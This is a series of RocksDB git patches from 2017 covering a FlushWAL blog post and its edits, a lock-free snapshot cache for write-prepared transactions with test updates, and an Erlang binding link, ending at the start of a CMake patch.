Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 25 Aug 2017 16:09:51 -0700 Subject: [PATCH 154/205] Blog post for FlushWAL Summary: Closes https://github.com/facebook/rocksdb/pull/2790 Differential Revision: D5711609 Pulled By: maysamyabandeh fbshipit-source-id: ea103dac013c0a6a031834541ad67e7d95a80fe8 --- docs/_posts/2017-08-24-pinnableslice.markdown | 4 +-- docs/_posts/2017-08-25-flushwal.markdown | 26 +++++++++++++++++++ 2 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 docs/_posts/2017-08-25-flushwal.markdown diff --git a/docs/_posts/2017-08-24-pinnableslice.markdown b/docs/_posts/2017-08-24-pinnableslice.markdown index a5026d5c4c7..7ac2fec34be 100644 --- a/docs/_posts/2017-08-24-pinnableslice.markdown +++ b/docs/_posts/2017-08-24-pinnableslice.markdown @@ -1,5 +1,5 @@ --- -title: PinnableSlice: less memcpy with point lookups +title: PinnableSlice; less memcpy with point lookups layout: post author: maysamyabandeh category: blog @@ -11,7 +11,7 @@ The classic API for [DB::Get](https://github.com/facebook/rocksdb/blob/9e5837111 Similarly to Slice, PinnableSlice refers to some in-memory data so it does not incur the memcpy cost. To ensure that the data will not be erased while it is being processed by the user, PinnableSlice, as its name suggests, has the data pinned in memory. The pinned data are released when PinnableSlice object is destructed or when ::Reset is invoked explicitly on it. -### How good it is? +### How good is it? Here are the improvements in throughput for an [in-memory benchmark](https://github.com/facebook/rocksdb/pull/1756#issuecomment-286201693): * value 1k byte: 14% diff --git a/docs/_posts/2017-08-25-flushwal.markdown b/docs/_posts/2017-08-25-flushwal.markdown new file mode 100644 index 00000000000..01f878e87b7 --- /dev/null +++ b/docs/_posts/2017-08-25-flushwal.markdown @@ -0,0 +1,26 @@ +--- +title: FlushWAL; less fwrite, faster writes +layout: post +author: maysamyabandeh +category: blog +--- + +When `DB::Put` is called, the data is written to both memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much as the memtable state that is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. 
It can however be configured to perform the flush manually after an explicit call to ::FlushWAL. Not doing an fwrite syscall after each ::Put offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput without compromising reliability.
+
+### How much is the gain?
+
+Using the `::FlushWAL` API along with setting `DBOptions.concurrent_prepare`, MyRocks achieves 40% higher throughput in Sysbench's [update-nonindex](https://github.com/akopytov/sysbench/blob/master/src/lua/oltp_update_non_index.lua) benchmark.
+
+### Write, Flush, and Sync
+
+The write to the WAL is first written to the application memory buffer. The buffer in the next step is "flushed" to the OS buffer by calling the fwrite syscall. The OS buffer is later "synced" to the persistent storage. The data in the OS buffer, although not persisted yet, will survive an application crash. By default, the flush occurs automatically upon each call to DB::Put or DB::Write. The user can additionally request sync after each write by setting WriteOptions::sync.
+
+### FlushWAL API
+
+The user can turn off the automatic flush of the WAL by setting `DBOptions::manual_wal_flush`. In that case, the WAL buffer is flushed when it is either full or `DB::FlushWAL` is called by the user. The API also accepts a boolean argument should we want to sync right after the flush: `::FlushWAL(true)`.
+
+### Success story: MyRocks
+
+Some applications that use RocksDB already have other mechanisms in place to provide reliability. MySQL for example uses 2PC (two-phase commit) to write to both the binlog and the storage engine, such as InnoDB or MyRocks. The group commit logic in MySQL allows the 1st phase (Prepare) to be run in parallel, but performs the 2nd phase (Commit) in a serial manner after a commit group is formed. This makes low commit latency in the storage engine essential for achieving high throughput. The commit in MyRocks includes writing to the RocksDB WAL, which, as explained above, by default incurs the latency of flushing the new WAL appends to the OS buffer.
+
+Since a storage engine commit is not visible to the users until the group commit finishes, and also because the binlog helps in recovering from some failure scenarios, MySQL can provide reliability without needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL.

From fbfa3e7a43526bdf38183f78383db62b430e3885 Mon Sep 17 00:00:00 2001
From: Maysam Yabandeh
Date: Sat, 26 Aug 2017 00:53:13 -0700
Subject: [PATCH 155/205] WriteAtPrepare: Efficient read from snapshot list

Summary:
Divide the old snapshots into two lists: a few that fit into a cached array, and the rest in a vector, which is expected to be empty in normal cases. The former optimizes concurrent reads from snapshots without requiring locks. It is done by an array of std::atomic, from which std::memory_order_acquire reads are compiled to simple read instructions on most x86_64 architectures.
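A rough sketch of the read path this design enables (sizes and names here are illustrative; the real implementation additionally deals with concurrent list updates and visibility ordering): the common case scans only a fixed array of atomics, and the mutex is taken only when the overflow vector is non-empty:

```cpp
#include <algorithm>
#include <atomic>
#include <cstdint>
#include <mutex>
#include <vector>

constexpr size_t kSnapshotCacheSize = 128;
std::atomic<uint64_t> snapshot_cache[kSnapshotCacheSize];  // lock-free tier
std::atomic<size_t> snapshots_total{0};
std::vector<uint64_t> snapshots_overflow;  // guarded by snapshots_mutex
std::mutex snapshots_mutex;

// Visit every live snapshot; concurrent readers never block each other in
// the common case because the first tier is read with atomic loads only.
template <typename Visitor>
void ForEachSnapshot(Visitor visit) {
  size_t total = snapshots_total.load(std::memory_order_acquire);
  size_t in_cache = std::min(total, kSnapshotCacheSize);
  for (size_t i = 0; i < in_cache; i++) {
    visit(snapshot_cache[i].load(std::memory_order_acquire));
  }
  if (total > kSnapshotCacheSize) {  // rare: fall back to the locked list
    std::lock_guard<std::mutex> guard(snapshots_mutex);
    for (uint64_t s : snapshots_overflow) {
      visit(s);
    }
  }
}
```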
Closes https://github.com/facebook/rocksdb/pull/2758 Differential Revision: D5660504 Pulled By: maysamyabandeh fbshipit-source-id: 524fcf9a8e7f90a92324536456912a99aaa6740c --- db/snapshot_impl.h | 9 +- include/rocksdb/utilities/transaction_db.h | 6 +- .../pessimistic_transaction_db.cc | 135 ++++++++++++++++-- .../transactions/pessimistic_transaction_db.h | 51 ++++++- utilities/transactions/transaction_test.cc | 33 +++-- 5 files changed, 201 insertions(+), 33 deletions(-) diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index 8441050fd2c..ad9c1a9fbcc 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -74,9 +74,11 @@ class SnapshotList { count_--; } - // retrieve all snapshot numbers. They are sorted in ascending order. + // retrieve all snapshot numbers up until max_seq. They are sorted in + // ascending order. std::vector GetAll( - SequenceNumber* oldest_write_conflict_snapshot = nullptr) const { + SequenceNumber* oldest_write_conflict_snapshot = nullptr, + const SequenceNumber& max_seq = kMaxSequenceNumber) const { std::vector ret; if (oldest_write_conflict_snapshot != nullptr) { @@ -88,6 +90,9 @@ class SnapshotList { } const SnapshotImpl* s = &list_; while (s->next_ != &list_) { + if (s->next_->number_ > max_seq) { + break; + } ret.push_back(s->next_->number_); if (oldest_write_conflict_snapshot != nullptr && diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 7a592c4f6cf..77043897a70 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -25,8 +25,10 @@ class TransactionDBMutexFactory; enum TxnDBWritePolicy { WRITE_COMMITTED = 0, // write only the committed data - WRITE_PREPARED, // write data after the prepare phase of 2pc - WRITE_UNPREPARED // write data before the prepare phase of 2pc + // TODO(myabandeh): Not implemented yet + WRITE_PREPARED, // write data after the prepare phase of 2pc + // TODO(myabandeh): Not implemented yet + WRITE_UNPREPARED // write data before the prepare phase of 2pc }; const uint32_t kInitialMaxDeadlocks = 5; diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 07c3eeeeb04..8fa9575e430 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -5,8 +5,13 @@ #ifndef ROCKSDB_LITE +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + #include "utilities/transactions/pessimistic_transaction_db.h" +#include #include #include #include @@ -34,6 +39,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( : std::shared_ptr( new TransactionDBMutexFactoryImpl())) { assert(db_impl_ != nullptr); + info_log_ = db_impl_->GetDBOptions().info_log; } // Support initiliazing PessimisticTransactionDB from a stackable db @@ -581,16 +587,23 @@ bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq, return false; } -void WritePreparedTxnDB::AddPrepared(uint64_t seq) { prepared_txns_.push(seq); } +void WritePreparedTxnDB::AddPrepared(uint64_t seq) { + ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Prepareing", seq); + WriteLock wl(&prepared_mutex_); + prepared_txns_.push(seq); +} void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, uint64_t commit_seq) { + ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Committing with %" PRIu64, + prepare_seq, commit_seq); auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE; CommitEntry evicted; bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted); if 
(to_be_evicted) {
    auto prev_max = max_evicted_seq_.load(std::memory_order_acquire);
    if (prev_max < evicted.commit_seq) {
+      // TODO(myabandeh): inc max in larger steps to avoid frequent updates
       auto max_evicted_seq = evicted.commit_seq;
       // When max_evicted_seq_ advances, move older entries from prepared_txns_
       // to delayed_prepared_. This guarantees that if a seq is lower than max,
@@ -607,11 +620,59 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq,
         delayed_prepared_empty_.store(false, std::memory_order_release);
       }
     }
+    // With each change to max_evicted_seq_ fetch the live snapshots behind it
+    SequenceNumber curr_seq;
+    std::vector<SequenceNumber> all_snapshots;
+    bool update_snapshots = false;
     {
-      WriteLock wl(&snapshots_mutex_);
       InstrumentedMutex(db_impl_->mutex());
-      snapshots_ = db_impl_->snapshots().GetAll();
+      // We use this to identify how fresh the snapshot list is. Since this
+      // is done atomically with obtaining the snapshot list, the one with
+      // the larger seq is more fresh. If the seqs are equal the full snapshot
+      // lists could still differ, since taking snapshots does not increase
+      // the db seq. However since we only care about snapshots before the
+      // new max, such recent snapshots would not be included in the
+      // list anyway.
+      curr_seq = db_impl_->GetLatestSequenceNumber();
+      if (curr_seq > snapshots_version_) {
+        // This is to avoid updating snapshots_ if it was already updated
+        // with a more recent version by a concurrent thread
+        update_snapshots = true;
+        // We only care about snapshots lower than max
+        all_snapshots =
+            db_impl_->snapshots().GetAll(nullptr, max_evicted_seq);
+      }
+    }
+    if (update_snapshots) {
+      WriteLock wl(&snapshots_mutex_);
+      snapshots_version_ = curr_seq;
+      // We update the list concurrently with the readers.
+      // Both new and old lists are sorted and the new list is a subset of the
+      // previous list plus some new items. Thus if a snapshot repeats in
+      // both new and old lists, it will appear higher in the new list. So if
+      // we simply insert the new snapshots in order, an overwritten item that
+      // is still valid in the new list is either written to the same place in
+      // the array or is written to a higher place before it gets
+      // overwritten by another item. This guarantees that a reader that reads
+      // the list bottom-up will eventually see a snapshot that repeats in the
+      // update, either before it gets overwritten by the writer or
+      // afterwards.
+      size_t i = 0;
+      auto it = all_snapshots.begin();
+      for (; it != all_snapshots.end() && i < SNAPSHOT_CACHE_SIZE;
+           it++, i++) {
+        snapshot_cache_[i].store(*it, std::memory_order_release);
+      }
+      snapshots_.clear();
+      for (; it != all_snapshots.end(); it++) {
+        // Insert them to a vector that is less efficient to access
+        // concurrently
+        snapshots_.push_back(*it);
+      }
+      // Update the size at the end. Otherwise a parallel reader might read
+      // items that are not set yet.
+      snapshots_total_.store(all_snapshots.size(), std::memory_order_release);
     }
     while (prev_max < max_evicted_seq &&
            !max_evicted_seq_.compare_exchange_weak(
@@ -621,17 +682,41 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq,
   }
   // After each eviction from commit cache, check if the commit entry should
   // be kept around because it overlaps with a live snapshot.
-  {
+  // First check the snapshot cache that is efficient for concurrent access
+  auto cnt = snapshots_total_.load(std::memory_order_acquire);
+  // The list might get updated concurrently as we are reading from it. The
+  // reader should be able to read all the snapshots that are still valid
+  // after the update. Since the surviving snapshots are written to a higher
+  // place before they get overwritten, a reader that reads bottom-up will
+  // eventually see them.
+  const bool next_is_larger = true;
+  SequenceNumber snapshot_seq = kMaxSequenceNumber;
+  size_t ip1 = std::min(cnt, SNAPSHOT_CACHE_SIZE);
+  for (; 0 < ip1; ip1--) {
+    snapshot_seq = snapshot_cache_[ip1 - 1].load(std::memory_order_acquire);
+    if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
+                                 snapshot_seq, !next_is_larger)) {
+      break;
+    }
+  }
+  if (UNLIKELY(SNAPSHOT_CACHE_SIZE < cnt && ip1 == SNAPSHOT_CACHE_SIZE &&
+               snapshot_seq < evicted.prep_seq)) {
+    // Then access the less efficient list of snapshots_
     ReadLock rl(&snapshots_mutex_);
+    // Items could have moved from snapshots_ to snapshot_cache_ before
+    // acquiring the lock. To make sure that we do not miss a valid snapshot,
+    // read snapshot_cache_ again while holding the lock.
+    for (size_t i = 0; i < SNAPSHOT_CACHE_SIZE; i++) {
+      snapshot_seq = snapshot_cache_[i].load(std::memory_order_acquire);
+      if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
+                                   snapshot_seq, next_is_larger)) {
         break;
       }
-      // then snapshot_seq < evicted.commit_seq
-      if (evicted.prep_seq <= snapshot_seq) {  // overlapping range
-        WriteLock wl(&old_commit_map_mutex_);
-        old_commit_map_empty_.store(false, std::memory_order_release);
-        old_commit_map_[evicted.prep_seq] = evicted.commit_seq;
+    }
+    for (auto snapshot_seq_2 : snapshots_) {
+      if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
+                                   snapshot_seq_2, next_is_larger)) {
+        break;
       }
     }
   }
@@ -691,7 +776,31 @@ bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq,
 }

 // 10m entry, 80MB size
-uint64_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE =
-    static_cast<uint64_t>(1 << 21);
+size_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = static_cast<size_t>(1 << 21);
+size_t WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE =
+    static_cast<size_t>(1 << 7);
+
+bool WritePreparedTxnDB::MaybeUpdateOldCommitMap(
+    const uint64_t& prep_seq, const uint64_t& commit_seq,
+    const uint64_t& snapshot_seq, const bool next_is_larger = true) {
+  // If we do not store an entry in old_commit_map we assume it is committed
+  // in all snapshots. If commit_seq <= snapshot_seq, it is considered already
+  // in the snapshot so we need not keep the entry around for this snapshot.
+  if (commit_seq <= snapshot_seq) {
+    // continue the search if the next snapshot could be smaller than
+    // commit_seq
+    return !next_is_larger;
+  }
+  // then snapshot_seq < commit_seq
+  if (prep_seq <= snapshot_seq) {  // overlapping range
+    WriteLock wl(&old_commit_map_mutex_);
+    old_commit_map_empty_.store(false, std::memory_order_release);
+    old_commit_map_[prep_seq] = commit_seq;
+    // Storing once is enough. No need to check it for other snapshots.
+    return false;
+  }
+  // continue the search if the next snapshot could be larger than prep_seq
+  return next_is_larger;
+}
+
 }  // namespace rocksdb
 #endif  // ROCKSDB_LITE
diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h
index 489da30bfcb..e3eec6b602a 100644
--- a/utilities/transactions/pessimistic_transaction_db.h
+++ b/utilities/transactions/pessimistic_transaction_db.h
@@ -107,6 +107,8 @@ class PessimisticTransactionDB : public TransactionDB {
   struct CommitEntry {
     uint64_t prep_seq;
     uint64_t commit_seq;
+    CommitEntry() : prep_seq(0), commit_seq(0) {}
+    CommitEntry(uint64_t ps, uint64_t cs) : prep_seq(ps), commit_seq(cs) {}
   };
 
  protected:
@@ -114,8 +116,10 @@ class PessimisticTransactionDB : public TransactionDB {
       Transaction* txn, const WriteOptions& write_options,
       const TransactionOptions& txn_options = TransactionOptions());
   DBImpl* db_impl_;
+  std::shared_ptr<Logger> info_log_;
 
  private:
+  friend class WritePreparedTxnDB;
   const TransactionDBOptions txn_db_options_;
   TransactionLockMgr lock_mgr_;
@@ -162,6 +166,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
   explicit WritePreparedTxnDB(DB* db,
                               const TransactionDBOptions& txn_db_options)
       : PessimisticTransactionDB(db, txn_db_options),
+        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
         COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
     init(txn_db_options);
   }
@@ -169,6 +174,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
   explicit WritePreparedTxnDB(StackableDB* db,
                               const TransactionDBOptions& txn_db_options)
       : PessimisticTransactionDB(db, txn_db_options),
+        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
         COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
     init(txn_db_options);
   }
@@ -192,6 +198,8 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
   friend class WritePreparedTransactionTest_IsInSnapshotTest_Test;
 
   void init(const TransactionDBOptions& /* unused */) {
+    snapshot_cache_ = unique_ptr<std::atomic<SequenceNumber>[]>(
+        new std::atomic<SequenceNumber>[SNAPSHOT_CACHE_SIZE] {});
     commit_cache_ =
         unique_ptr<CommitEntry[]>(new CommitEntry[COMMIT_CACHE_SIZE]{});
   }
@@ -199,8 +207,10 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
   // A heap with the amortized O(1) complexity for erase. It uses one extra heap
   // to keep track of erased entries that are not yet on top of the main heap.
   class PreparedHeap {
-    std::priority_queue<uint64_t> heap_;
-    std::priority_queue<uint64_t> erased_heap_;
+    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
+        heap_;
+    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
+        erased_heap_;
 
    public:
     bool empty() { return heap_.empty(); }
@@ -216,7 +226,7 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
     }
     void erase(uint64_t seq) {
       if (!heap_.empty()) {
-        if (heap_.top() < seq) {
+        if (seq < heap_.top()) {
           // Already popped, ignore it.
         } else if (heap_.top() == seq) {
           heap_.pop();
@@ -242,15 +252,42 @@ class WritePreparedTxnDB : public PessimisticTransactionDB {
   bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry,
                            CommitEntry new_entry);
 
+  // Add a new entry to old_commit_map_ if prep_seq <= snapshot_seq <
+  // commit_seq. Return false if checking the next snapshot(s) is not needed.
+  // This is the case if the entry is already added to old_commit_map_ or none
+  // of the next snapshots could satisfy the condition. next_is_larger: the
+  // next snapshot will be a larger value.
+  bool MaybeUpdateOldCommitMap(const uint64_t& prep_seq,
+                               const uint64_t& commit_seq,
+                               const uint64_t& snapshot_seq,
+                               const bool next_is_larger);
+
   // The list of live snapshots at the last time that max_evicted_seq_ advanced.
-  // The list sorted in ascending order. Thread-safety is provided with
-  // snapshots_mutex_.
+  // The list is stored in two data structures: in snapshot_cache_, which is
+  // efficient for concurrent reads, and in snapshots_ if the data does not fit
+  // into snapshot_cache_. snapshots_total_ is the total number of snapshots in
+  // the two lists.
+  std::atomic<size_t> snapshots_total_ = {};
+  // The list sorted in ascending order. Thread-safety for writes is provided
+  // with snapshots_mutex_, and concurrent reads are safe due to std::atomic
+  // for each entry. On x86_64 such reads compile to simple read instructions.
+  // 128 entries by default.
+  // TODO(myabandeh): avoid non-const static variables
+  static size_t DEF_SNAPSHOT_CACHE_SIZE;
+  const size_t SNAPSHOT_CACHE_SIZE;
+  unique_ptr<std::atomic<SequenceNumber>[]> snapshot_cache_;
+  // 2nd list for storing snapshots. The list sorted in ascending order.
+  // Thread-safety is provided with snapshots_mutex_.
   std::vector<SequenceNumber> snapshots_;
+  // The version of the latest list of snapshots. This can be used to avoid
+  // rewriting a list that is concurrently updated with a more recent version.
+  SequenceNumber snapshots_version_ = 0;
+
   // A heap of prepared transactions. Thread-safety is provided with
   // prepared_mutex_.
   PreparedHeap prepared_txns_;
-  static uint64_t DEF_COMMIT_CACHE_SIZE;
-  const uint64_t COMMIT_CACHE_SIZE;
+  // TODO(myabandeh): avoid non-const static variables
+  static size_t DEF_COMMIT_CACHE_SIZE;
+  const size_t COMMIT_CACHE_SIZE;
   // commit_cache_ must be initialized to zero to tell apart an empty index from
   // a filled one. Thread-safety is provided with commit_cache_mutex_.
   unique_ptr<CommitEntry[]> commit_cache_;
diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc
index 2e8c87f49ac..eac8e563d7b 100644
--- a/utilities/transactions/transaction_test.cc
+++ b/utilities/transactions/transaction_test.cc
@@ -5,6 +5,11 @@
 
 #ifndef ROCKSDB_LITE
 
+#ifndef __STDC_FORMAT_MACROS
+#define __STDC_FORMAT_MACROS
+#endif
+
+#include <inttypes.h>
 #include
 #include
 #include
@@ -4734,8 +4739,10 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
   WriteOptions wo;
   // Use small commit cache to trigger lots of eviction and fast advance of
   // max_evicted_seq_
-  WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE =
-      8;  // will take effect after ReOpen
+  // will take effect after ReOpen
+  WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = 8;
+  // Same for snapshot cache size
+  WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE = 5;
 
   // Take some preliminary snapshots first. This is to stress the data structure
+  // that holds the old snapshots as it will be designed to be efficient when
@@ -4755,6 +4762,7 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
       uint64_t cur_txn = 0;
       // Number of snapshots taken so far
       int num_snapshots = 0;
+      std::vector<const Snapshot*> to_be_released;
       // Number of gaps applied so far
       int gap_cnt = 0;
       // The final snapshot that we will inspect
@@ -4800,14 +4808,17 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
 
         if (num_snapshots < max_snapshots - 1) {
           // Take preliminary snapshots
-          db->GetSnapshot();
+          auto tmp_snapshot = db->GetSnapshot();
+          to_be_released.push_back(tmp_snapshot);
           num_snapshots++;
         } else if (gap_cnt < max_gap) {
           // Wait for some gap before taking the final snapshot
           gap_cnt++;
         } else if (!snapshot) {
           // Take the final snapshot if it is not already taken
-          snapshot = db->GetSnapshot()->GetSequenceNumber();
+          auto tmp_snapshot = db->GetSnapshot();
+          to_be_released.push_back(tmp_snapshot);
+          snapshot = tmp_snapshot->GetSequenceNumber();
           // We increase the db seq artificially by a dummy Put. Check that this
           // technique is effective and the db seq is the same as ours.
           ASSERT_EQ(snapshot, seq);
@@ -4823,11 +4834,12 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
             (committed_before.find(s) != committed_before.end());
         bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot);
         if (was_committed != is_in_snapshot) {
-          printf(
-              "max_snapshots %d max_gap %d seq %lu max %lu snapshot %lu "
-              "gap_cnt %d num_snapshots %d\n",
-              max_snapshots, max_gap, seq, wp_db->max_evicted_seq_.load(),
-              snapshot, gap_cnt, num_snapshots);
+          printf("max_snapshots %d max_gap %d seq %" PRIu64 " max %" PRIu64
+                 " snapshot %" PRIu64
+                 " gap_cnt %d num_snapshots %d s %" PRIu64 "\n",
+                 max_snapshots, max_gap, seq,
+                 wp_db->max_evicted_seq_.load(), snapshot, gap_cnt,
+                 num_snapshots, s);
         }
         ASSERT_EQ(was_committed, is_in_snapshot);
         found_committed = found_committed || is_in_snapshot;
@@ -4846,6 +4858,9 @@ TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
       }
       ASSERT_TRUE(wp_db->delayed_prepared_.empty());
       ASSERT_TRUE(wp_db->prepared_txns_.empty());
+      for (auto s : to_be_released) {
+        db->ReleaseSnapshot(s);
+      }
     }
   }
 }

From 2972a702a418139edf56c71ecafcef8e176552c5 Mon Sep 17 00:00:00 2001
From: Maysam Yabandeh
Date: Sun, 27 Aug 2017 07:27:22 -0700
Subject: [PATCH 156/205] Minor updates to FlushWAL blog

Summary:
Closes https://github.com/facebook/rocksdb/pull/2792

Differential Revision: D5715365

Pulled By: maysamyabandeh

fbshipit-source-id: 0837b93ea1d4b0a08dfb3cd0d1feb6e098ef26a4
---
 docs/_posts/2017-08-25-flushwal.markdown | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/docs/_posts/2017-08-25-flushwal.markdown b/docs/_posts/2017-08-25-flushwal.markdown
index 01f878e87b7..2dc5626ad48 100644
--- a/docs/_posts/2017-08-25-flushwal.markdown
+++ b/docs/_posts/2017-08-25-flushwal.markdown
@@ -5,7 +5,7 @@ author: maysamyabandeh
 category: blog
 ---
 
-When `DB::Put` is called, the data is written to both memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much as the memtable state that is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. It however can be configured to perform the flush manually after an explicit call to ::FlushWAL. Not doing fwrite syscall after each ::Put offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput with however no compromise in reliability.
+When `DB::Put` is called, the data is written to both the memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much of the memtable state as is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. It can however be configured to perform the flush manually after an explicit call to `::FlushWAL`. Not issuing an fwrite syscall after each `::Put` offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput with no compromise in reliability.
 
 ### How much is the gain?
 
@@ -13,7 +13,7 @@ Using `::FlushWAL` API along with setting `DBOptions.concurrent_prepare`, MyRocks achieves 40% higher throughput in Sysbench's update-nobarrier benchmark.
 
 ### Write, Flush, and Sync
 
-The write to the WAL is first written to the application memory buffer. The buffer in the next step is "flushed" to OS buffer by calling fwrite syscall. The OS buffer is later "synced" to the persistent storage. The data in the OS buffer, although not persisted yet, will survive the application crash. By default, the flush occurs automatically upon each call to DB::Put or DB::Write. The user can additionally request sync after each write by setting WriteOptions::sync.
+The write to the WAL is first written to the application memory buffer. The buffer is next "flushed" to the OS buffer by calling the fwrite syscall. The OS buffer is later "synced" to persistent storage. The data in the OS buffer, although not persisted yet, will survive an application crash. By default, the flush occurs automatically upon each call to `DB::Put` or `DB::Write`. The user can additionally request a sync after each write by setting `WriteOptions::sync`.
 
 ### FlushWAL API
 
@@ -23,4 +23,4 @@ The user can turn off the automatic flush of the WAL by setting `DBOptions::manu
 
 Some applications that use RocksDB already have other mechanisms in place to provide reliability. MySQL for example uses 2PC (two-phase commit) to write to both the binlog as well as the storage engine, such as InnoDB or MyRocks. The group commit logic in MySQL allows the 1st phase (Prepare) to be run in parallel but, after a commit group is formed, performs the 2nd phase (Commit) in a serial manner. This makes low commit latency in the storage engine essential for achieving high throughput. The commit in MyRocks includes writing to the RocksDB WAL, which, as explained above, by default incurs the latency of flushing the new WAL appends to the OS buffer.
 
-Since a storage engine commit is not visible to the users until the group commit finishes, and also because binlog helps in recovering from some failure scenarios, MySQL can provide reliability without however needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL.
+Since the binlog helps in recovering from some failure scenarios, MySQL can provide reliability without needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL.
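
For illustration (not part of the patch): a minimal sketch of how an application might combine `DBOptions::manual_wal_flush` with `::FlushWAL`. The database path and the decision of when to flush are illustrative assumptions.

```cpp
#include <cassert>
#include "rocksdb/db.h"

int main() {
  rocksdb::Options options;
  options.create_if_missing = true;
  // Disable the automatic flush of the WAL to the OS buffer on every write.
  options.manual_wal_flush = true;

  rocksdb::DB* db = nullptr;
  rocksdb::Status s = rocksdb::DB::Open(options, "/tmp/flushwal_demo", &db);
  assert(s.ok());

  // Writes now reach only the application-memory WAL buffer.
  s = db->Put(rocksdb::WriteOptions(), "key", "value");
  assert(s.ok());

  // Flush the buffered WAL entries to the OS buffer at a time the
  // application chooses; pass true to also sync to persistent storage.
  s = db->FlushWAL(false /* sync */);
  assert(s.ok());

  delete db;
  return 0;
}
```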
From 5444345588adc5452be8864d3a57ee229afe733b Mon Sep 17 00:00:00 2001
From: benoitc
Date: Mon, 28 Aug 2017 16:27:20 -0700
Subject: [PATCH 157/205] add Erlang to the list of language bindings

Summary:
small edit of the language binding file to add the Erlang binding.
Closes https://github.com/facebook/rocksdb/pull/2797

Differential Revision: D5722235

Pulled By: sagar0

fbshipit-source-id: 8ecd74996dad4cac19666783256cfa4d9ce09160
---
 LANGUAGE-BINDINGS.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/LANGUAGE-BINDINGS.md b/LANGUAGE-BINDINGS.md
index 8084b6c3019..ffeed98f28d 100644
--- a/LANGUAGE-BINDINGS.md
+++ b/LANGUAGE-BINDINGS.md
@@ -13,3 +13,4 @@ This is the list of all known third-party language bindings for RocksDB. If some
 * https://github.com/spacejam/rust-rocksdb
 * https://github.com/bh1xuw/rust-rocks
 * D programming language - https://github.com/b1naryth1ef/rocksdb
+* Erlang - https://gitlab.com/barrel-db/erlang-rocksdb

From c21ea8f7a6ee8fed5dde323528c1e260d0d47567 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Pawe=C5=82=20Bylica?=
Date: Mon, 28 Aug 2017 16:56:49 -0700
Subject: [PATCH 158/205] CMake: Add support for CMake packages

Summary:
